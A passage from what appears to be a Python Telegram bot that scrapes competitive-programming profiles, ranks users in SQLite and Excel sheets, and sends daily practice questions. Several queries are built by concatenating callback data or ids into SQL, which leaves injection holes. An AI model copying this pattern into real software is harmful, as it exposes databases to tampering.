workbook = Workbook(mount_point + "HE.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HE FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "HR.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HR FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HR AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "SP.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, SP FROM datas")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "CF.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CF FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "CC.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CC AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point+'all.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
conn.commit()
conn.close()
bot = Bot(TOKEN)
for chatids in adminlist:
bot.send_message(chat_id=chatids, text="Data updated")
# START OF CONVERSATION HANDLER TO SUBSCRIBE TO QUESTION OF THE DAY
@timeouts.wrapper
def subscribe(bot,update):
if update.message.chat_id<0:
update.message.reply_text("I detected this is a group\nIf you subscribe here I will send questions to the group\nTo get questions to yourself subscribe to me in personal message")
keyboard = [[InlineKeyboardButton("CODEFORCES", callback_data='CFsub3'),
InlineKeyboardButton("CODECHEF", callback_data='CCsub3')]]
reply_markup=InlineKeyboardMarkup(keyboard)
bot.send_message(text="Please select the website to which you wish to subscribe for getting question of the day",chat_id=update.message.chat_id,reply_markup=reply_markup)
return SUBSEL
def subsel(bot,update):
query=update.callback_query
val=query.data
if val=='CCsub3':
keyboard = [[InlineKeyboardButton("Beginner", callback_data='BEGINNERcc2'),
InlineKeyboardButton("Easy", callback_data='EASYcc2')],
[InlineKeyboardButton("Medium", callback_data='MEDIUMcc2'),
InlineKeyboardButton("Hard", callback_data='HARDcc2')],
[InlineKeyboardButton("Challenge", callback_data='CHALLENGEcc2')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(chat_id=query.message.chat_id,message_id=query.message.message_id,text="Please select",reply_markup=reply_markup)
return SUBCC
elif val=='CFsub3':
keyboard = [[InlineKeyboardButton("A", callback_data='Acf2'),
InlineKeyboardButton("B", callback_data='Bcf2'), InlineKeyboardButton("C", callback_data='Ccf2')],
[InlineKeyboardButton("D", callback_data='Dcf2'),
InlineKeyboardButton("E", callback_data='Ecf2'), InlineKeyboardButton("F", callback_data='Fcf2')],
[InlineKeyboardButton("OTHERS", callback_data='OTHERScf2')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id, text="Please select",reply_markup=reply_markup)
return SUBCF
def subcc(bot,update):
conn = sqlite3.connect(mount_point+'coders1.db')
query = update.callback_query
val = query.data
val=str(val).replace("cc2","")
a=str(query.message.chat_id)
c=conn.cursor()
c.execute("INSERT OR IGNORE INTO subscribers (id,CC,CCSEL) VALUES (?, ?, ?)", (a,1,val))
if c.rowcount == 0:
c.execute("UPDATE subscribers SET CC = (?) , CCSEL= (?) WHERE id = (?) ", (1, val, a))
conn.commit()
conn.close()
bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id, text="I will send you a question of type "+val+" everyday from codechef \nyou can use command /unsubscribe to unsubscribe ")
return ConversationHandler.END
def subcf(bot,update):
conn = sqlite3.connect(mount_point+'coders1.db')
query = update.callback_query
val = query.data
val=str(val).replace("cf2","")
a=str(query.message.chat_id)
c=conn.cursor()
c.execute("INSERT OR IGNORE INTO subscribers (id,CF,CFSEL) VALUES (?, ?, ?)", (a,1,val))
if c.rowcount == 0:
c.execute("UPDATE subscribers SET CF = (?) , CFSEL= (?) WHERE id = (?) ", (1, val, a))
conn.commit()
conn.close()
bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id, text="I will send you a question of type "+val+" everyday from codeforces \nyou can use command /unsubscribe to unsubscribe ")
return ConversationHandler.END
# END OF CONVERSATION HANDLER TO SUBSCRIBE TO QUESTION OF THE DAY
# START OF CONVERSATION HANDLER TO UNSUBSCRIBE FROM QUESTION OF THE DAY
@timeouts.wrapper
def unsubsel(bot,update):
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute("SELECT id FROM subscribers WHERE id=(?)", (str(update.message.chat_id),))
if not c.fetchone():
update.message.reply_text("You have not subscribed for question of the day")
c.close()
return ConversationHandler.END
else:
c.execute("SELECT CC,CF FROM subscribers WHERE id=(?)",(str(update.message.chat_id),))
keyboard=[]
for row in c.fetchall():
if(row[0]==1):
keyboard.append([InlineKeyboardButton("CODECHEF", callback_data='CCunsub4')])
if(row[1]==1):
keyboard.append([InlineKeyboardButton("CODEFORCES", callback_data='CFunsub4')])
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("Select the one you want to unsubscribe from",reply_markup=reply_markup)
c.close()
conn.close()
return UNSUB
def unsub(bot,update):
query=update.callback_query
val=query.data
val=str(val).replace("unsub4","")
a = str(query.message.chat_id)
conn = sqlite3.connect(mount_point+'coders1.db')
c=conn.cursor()
c.execute("UPDATE subscribers SET " + val + " = 0 WHERE id = (?) ", (a,))
conn.commit()
c.execute("SELECT CC,CF FROM subscribers WHERE id=(?)", (a,))
i=0
for row in c.fetchall():
if (row[0] == 0):
i=i+1
if (row[1] == 0):
i=i+1
if i==2:
c.execute("DELETE FROM subscribers WHERE id=(?)",(a,))
conn.commit()
bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id, text="unsubscribed")
c.close()
conn.close()
return ConversationHandler.END
# END OF CONVERSATION HANDLER TO UNSUBSCRIBE FROM QUESTION OF THE DAY
# FUNCTION TO SEND QUESTION TO COMPETITIVE CODERS EVERY DAY
@sched.scheduled_job('cron', hour=0, minute=0)
def sender():
bot = Bot(TOKEN)
global scce, s1cce, scch, s1cch, sccm, s1ccm, sccs, s1ccs, sccc, s1ccc,qcf
conn = sqlite3.connect(mount_point+'coders1.db')
c=conn.cursor()
c.execute("SELECT * FROM subscribers")
for row in c.fetchall():
if(row[1]==1):
val=row[3]
if val == 'BEGINNER':
n = random.randint(0, len(sccs) - 1)
strt = sccs[n].text.strip("\n\n ")
strn = s1ccs[n].text
if val == 'EASY':
n = random.randint(0, len(scce) - 1)
strt = scce[n].text.strip("\n\n ")
strn = s1cce[n].text
if val == 'MEDIUM':
n = random.randint(0, len(sccm) - 1)
strt = sccm[n].text.strip("\n\n ")
strn = s1ccm[n].text
if val == 'HARD':
n = random.randint(0, len(scch) - 1)
strt = scch[n].text.strip("\n\n ")
strn = s1cch[n].text
if val == 'CHALLENGE':
n = random.randint(0, len(sccc) - 1)
strt = sccc[n].text.strip("\n\n ")
strn = s1ccc[n].text
bot.send_message(
text="Random " + val + " question from codechef\n\n" + strt + "\n" + "https://www.codechef.com/problems/" + strn,
chat_id=row[0])
if(row[2]==1):
val=row[4]
if val == 'A':
n = random.randint(0, len(qcf['A']) - 1)
strn = qcf['A'][n]
elif val == 'B':
n = random.randint(0, len(qcf['B']) - 1)
strn = qcf['B'][n]
elif val == 'C':
n = random.randint(0, len(qcf['C']) - 1)
strn = qcf['C'][n]
elif val == 'D':
n = random.randint(0, len(qcf['D']) - 1)
strn = qcf['D'][n]
elif val == 'E':
n = random.randint(0, len(qcf['E']) - 1)
strn = qcf['E'][n]
elif val == 'F':
n = random.randint(0, len(qcf['F']) - 1)
strn = qcf['F'][n]
else:
n = random.randint(0, len(qcf['OTHERS']) - 1)
strn = qcf['OTHERS'][n]
bot.send_message(
text="Random " + val + " question from codeforces\n\n" + strn,
chat_id=row[0])
c.close()
conn.close()
sched.start()
# START OF CONVERSATION HANDLER FOR UPDATING USERS DATA ON HIS WISH
@timeouts.wrapper
def updatesel(bot, update):
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HEupd5'),
InlineKeyboardButton("Hackerrank", callback_data='HRupd5')],
[InlineKeyboardButton("Codechef", callback_data='CCupd5'),
InlineKeyboardButton("Spoj", callback_data='SPupd5')],
[InlineKeyboardButton("Codeforces", callback_data='CFupd5'),
InlineKeyboardButton("ALL", callback_data='ALLupd5')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("PLEASE SELECT THE JUDGE FROM WHICH YOU WANT TO UPDATE YOUR PROFILE",
reply_markup=reply_markup)
return UPDA
# FUNCTION TO UPDATE PARTICULR ENTRY USER SELECTED
def updasel(bot, update):
query = update.callback_query
val = query.data
val=str(val).replace("upd5","")
a = str(query.from_user.id)
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute("SELECT id FROM handles WHERE id=(?)", (a,))
if not c.fetchone():
bot.edit_message_text(text='You are not registered to the bot. Please register using /register command',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
if val == "ALL":
# IF USER SELECTED ALL UPDATING ALL HIS VALUES
c.execute('SELECT id, HE, HR, CC, SP, CF FROM handles WHERE id=(?)', (a,))
for row in c.fetchall():
a = ""
he = ""
hr = ""
sp = ""
cc = ""
cf = ""
for wo in range(0, 6):
if wo == 0:
if row[wo] is None:
bot.edit_message_text(text='You are not registered to the bot',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
a = row[wo]
elif wo == 1 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerearth.com/@' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
stri = "HACKEREARTH\n"
for i in soup.find_all('a', {
"href": "/users/" + str(row[wo]) + "/activity/hackerearth/#user-rating-graph"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[wo]) + "/followers/"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[wo]) + "/following/"}):
stri = stri + i.text + "\n"
he = stri
except urllib.error.URLError as e:
pass
elif wo == 2 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerrank.com/' + str(row[wo]) + '?hr_r=1')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('script', {"id": "initialData"}).text
s = soup.find('script', {"id": "initialData"}).text
i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
i = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace("{",
"").replace(
"}",
"").replace(
'"', "").split(">")
s1 = "HACKERRANK\n"
for j in range(1, 10):
s1 = s1 + i[j] + "\n"
hr = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif wo == 3 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
count=0
while(count<5):
try:
sauce = opener.open('https://www.codechef.com/users/' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
try:
s1 = soup.find('span', {"class": "rating"}).text + "\n"
except AttributeError:
s1 = ""
s = "CODECHEF" + "\n" + s1 + "rating: " + soup.find('a', {
"href": "http://www.codechef.com/ratings/all"}).text + "\n" + soup.find('div', {
"class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n')
cc = s
break
except AttributeError:
break
except urllib.error.URLError as e:
count=count+1
continue
elif wo == 4 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://www.spoj.com/users/' + str(row[wo]) + '/')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('div', {"class": "col-md-3"}).text
s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
s = s[3].strip().split(":")
s = "SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
"class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace("\t",
"").replace(
"\xa0", "").strip('\n')
sp = s
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif wo == 5 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://codeforces.com/profile/' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).text
s = soup.find_all('span', {"style": "font-weight:bold;"})
if len(s) == 0:
s2 = ""
else:
s2 = "contest rating: " + s[0].text + "\n" + "max: " + s[1].text + s[2].text + "\n"
s1 = "CODEFORCES\n" + s2 + "contributions: " + soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).nextSibling.nextSibling.text
cf = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
if not he=='' or (he=='' and (row[1] == '' or row[1] is None)):
c.execute("UPDATE datas SET HE=(?) WHERE id=(?)",(he,str(a)))
try:
rat = he.split('\n')
if (rat[1] == "Rating"):
rat2 = rat[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not hr == '' or (hr=='' and (row[2] == '' or row[2] is None)):
c.execute("UPDATE datas SET HR=(?) WHERE id=(?)", (hr,str(a)))
try:
rat = hr.split('\n')
rat2 = rat[1].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not cf == '' or (cf=='' and (row[5] == '' or row[5] is None)):
c.execute("UPDATE datas SET CF=(?) WHERE id=(?)", (cf,str(a)))
try:
rat = cf.split("\n")
if "contest rating:" in rat[1]:
rat2 = rat[1].split(" ")[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not cc == '' or (cc=='' and (row[3] == '' or row[3] is None)):
c.execute("UPDATE datas SET CC=(?) WHERE id=(?)", (cc,str(a)))
try:
rat = cc.split("\n")
if not "rating" in rat[1]:
rat2 = rat[2].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not sp=='' or (sp=='' and (row[4] == '' or row[4] is None)):
c.execute("UPDATE datas SET SP=(?) WHERE id=(?)", (sp,str(a)))
# RECREATING ALL XLSX FILES
workbook = Workbook(mount_point + "HE.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HE FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "HR.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HR FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HR AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "SP.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, SP FROM datas")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "CF.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CF FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "CC.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CC AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.delete_message(chat_id=query.message.chat_id, message_id=query.message.message_id)
else:
# ELSE ONLY UPDATING THE PARTICULAR ENTRY
c.execute("SELECT " + val + " FROM handles WHERE id=(?)", (a,))
for row in c.fetchall():
if row[0] == "" or row[0] is None:
bot.edit_message_text(text='You are not registered to the bot with' + val,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
else:
print(row[0])
if val == "HE":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerearth.com/@' + str(row[0]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
stri = "HACKEREARTH\n"
for i in soup.find_all('a', {
"href": "/users/" + str(row[0]) + "/activity/hackerearth/#user-rating-graph"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[0]) + "/followers/"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[0]) + "/following/"}):
stri = stri + i.text + "\n"
ans = stri
except urllib.error.URLError as e:
pass
elif val == 'HR':
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerrank.com/' + str(row[0]) + '?hr_r=1')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('script', {"id": "initialData"}).text
s = soup.find('script', {"id": "initialData"}).text
i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
i = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace("{",
"").replace(
"}",
"").replace(
'"', "").split(">")
s1 = "HACKERRANK\n"
for j in range(1, 10):
s1 = s1 + i[j] + "\n"
ans = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif val == "CC":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
count=0
while(count<5):
try:
sauce = opener.open('https://www.codechef.com/users/' + str(row[0]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
try:
s1 = soup.find('span', {"class": "rating"}).text + "\n"
except AttributeError:
s1 = ""
s = "CODECHEF" + "\n" + s1 + "rating: " + soup.find('a', {
"href": "http://www.codechef.com/ratings/all"}).text + "\n" + soup.find('div', {
"class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n')
ans = s
break
except AttributeError:
break
except urllib.error.URLError as e:
count=count+1
continue
elif val == "SP":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://www.spoj.com/users/' + str(row[0]) + '/')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('div', {"class": "col-md-3"}).text
s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
s = s[3].strip().split(":")
s = "SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
"class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace("\t",
"").replace(
"\xa0", "").strip('\n')
ans = s
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif val == "CF":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://codeforces.com/profile/' + str(row[0]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).text
s = soup.find_all('span', {"style": "font-weight:bold;"})
if len(s) == 0:
s2 = ""
else:
s2 = "contest rating: " + s[0].text + "\n" + "max: " + s[1].text + s[2].text + "\n"
s1 = "CODEFORCES\n" + s2 + "contributions: " + soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).nextSibling.nextSibling.text
ans = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
c.execute("UPDATE datas SET " + val + " = (?) WHERE id = (?) ", (ans, a))
if val == 'HE':
try:
rat = ans.split('\n')
if (rat[1] == "Rating"):
rat2 = rat[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, a))
except:
pass
elif val == 'HR':
try:
rat = ans.split('\n')
rat2 = rat[1].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, a))
except:
pass
elif val == 'CF':
try:
rat = ans.split("\n")
if "contest rating:" in rat[1]:
rat2 = rat[1].split(" ")[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, a))
except:
pass
elif val == 'CC':
try:
rat = ans.split("\n")
if not "rating" in rat[1]:
rat2 = rat[2].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, a))
except:
pass
bot.edit_message_text(text=""+ans, chat_id=query.message.chat_id, message_id=query.message.message_id)
# RECREATING ALL THE XLMX FILES
workbook = Workbook(mount_point + val + ".xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
if not val=="SP":
mysel = c.execute(
"SELECT datas.name, datas." + val + " FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority." + val + " AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
else:
mysel = c.execute(
"SELECT name, " + val + " FROM datas")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point+'all.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.send_message(text='Successfully updated',
chat_id=query.message.chat_id)
conn.commit()
conn.close()
return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR UPDATING USERS DATA ON HIS WISH
# START OF CONVERSATION HANDLER TO GET THE RANKLIST
@timeouts.wrapper
def ranklist(bot, update):
keyboard = [[InlineKeyboardButton("EVERY ONE", callback_data='allsel1'),
InlineKeyboardButton("MINE", callback_data='minesel1')],
[InlineKeyboardButton("GET BY NAME", callback_data='getNamesel1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("Please select the ranklist you want", reply_markup=reply_markup)
return SELECTION
# FUNCTION TO GET THE USER REQUEST AND SHOW MENU OF RANKLISTS
def selection(bot, update):
query = update.callback_query
val = query.data
val=str(val).replace("sel1","")
if val == "all":
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HElist6'),
InlineKeyboardButton("Hackerrank", callback_data='HRlist6')],
[InlineKeyboardButton("Codechef", callback_data='CClist6'),
InlineKeyboardButton("Spoj", callback_data='SPlist6')],
[InlineKeyboardButton("Codeforces", callback_data='CFlist6'),
InlineKeyboardButton("ALL", callback_data='ALLlist6')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(text='please select the judge or select all for showing all', reply_markup=reply_markup,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return HOLO
elif val == "mine":
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
print(str(query.from_user.id))
c.execute("SELECT id FROM datas WHERE id=" + str(query.from_user.id))
if c.fetchone():
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HElist7'),
InlineKeyboardButton("Hackerrank", callback_data='HRlist7')],
[InlineKeyboardButton("Codechef", callback_data='CClist7'),
InlineKeyboardButton("Spoj", callback_data='SPlist7')],
[InlineKeyboardButton("Codeforces", callback_data='CFlist7'),
InlineKeyboardButton("ALL", callback_data='ALLlist7')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(text='please select the judge or select all for showing all',
reply_markup=reply_markup,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
c.close()
return SOLO
else:
conn.close()
bot.edit_message_text(
text='You are not registered to the bot. please register to it using /register command',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
elif val == "getName":
bot.edit_message_text(text='please enter the name',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return POLO
else:
return ConversationHandler.END
# FUNCTION TO GET THE USERS RANKLIST
def solo(bot, update):
query = update.callback_query
val = query.data
choices = ['HElist7', 'HRlist7', 'CClist7', 'SPlist7', 'CFlist7', 'ALLlist7']
if val not in choices:
return ConversationHandler.END
val=str(val).replace("list7","")
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
if val == "ALL":
a = str(query.from_user.id)
c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE id=" + a)
bot.edit_message_text(text='Sending please wait',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
workbook = Workbook('me.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE id=" + a)
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.send_document(chat_id=query.message.chat_id, document=open('me.xlsx', 'rb'))
os.remove('me.xlsx')
else:
a = str(query.from_user.id)
c.execute("SELECT " + val + " FROM datas WHERE id=" + a)
for i in c.fetchall():
if i[0] is None or i[0] == "":
bot.edit_message_text(text="NOT REGISTERED",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
else:
bot.edit_message_text(text="" + i[0],
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.commit()
conn.close()
return ConversationHandler.END
# FUNCTION TO GET THE RANKLIST MENU OF THE USER BY SEARCHING IS NAME
def polo(bot, update, user_data):
msg = update.message.text.upper()
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute("SELECT name FROM handles WHERE name=(?)", (msg,))
if c.fetchone():
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HElist8'),
InlineKeyboardButton("Hackerrank", callback_data='HRlist8')],
[InlineKeyboardButton("Codechef", callback_data='CClist8'),
InlineKeyboardButton("Spoj", callback_data='SPlist8')],
[InlineKeyboardButton("Codeforces", callback_data='CFlist8'),
InlineKeyboardButton("ALL", callback_data='ALLlist8')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text('please select the judge or select all for showing all', reply_markup=reply_markup)
